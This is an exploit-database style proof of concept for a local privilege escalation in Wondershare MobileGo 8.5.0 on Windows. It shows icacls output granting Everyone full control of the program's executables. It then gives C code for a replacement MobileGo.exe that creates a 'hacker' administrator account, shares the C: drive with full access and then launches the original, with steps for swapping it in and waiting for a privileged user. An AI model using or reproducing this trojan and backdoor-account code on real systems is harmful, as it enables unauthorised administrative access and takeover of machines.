扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 |
# Exploit Title: MobileGo 8.5.0 - Insecure File Permissions # Exploit Author: ZwX # Exploit Date: 2019-11-15 # Vendor Homepage : https://www.wondershare.net/ # Software Link: https://www.wondershare.net/mobilego/ # Tested on OS: Windows 7 # Proof of Concept (PoC): ========================== C:\Program Files\Wondershare\MobileGo>icacls *.exe adb.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) APKInstaller.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) BsSndRpt.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) DriverInstall.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) fastboot.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) FetchDriver.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) MGNotification.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) MobileGo.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) MobileGoService.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) unins000.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) URLReqService.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) WAFSetup.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) WsConverter.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) WsMediaInfo.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) #Exploit code(s): ================= 1) Compile below 'C' code name it as "MobileGo.exe" #include<windows.h> int main(void){ system("net user hacker abc123 /add"); system("net localgroup Administrators hacker/add"); system("net share SHARE_NAME=c:\ /grant:hacker,full"); WinExec("C:\\Program Files\\Wondershare\\MobileGo\\~MobileGo.exe",0); return 0; } 2) Rename original "MobileGo.exe" to "~MobileGo.exe" 3) Place our malicious "MobileGo.exe" in the MobileGo directory 4) Disconnect and wait for a more privileged user to connect and use MobileGo IDE. Privilege Successful Escalation |
体验盒子
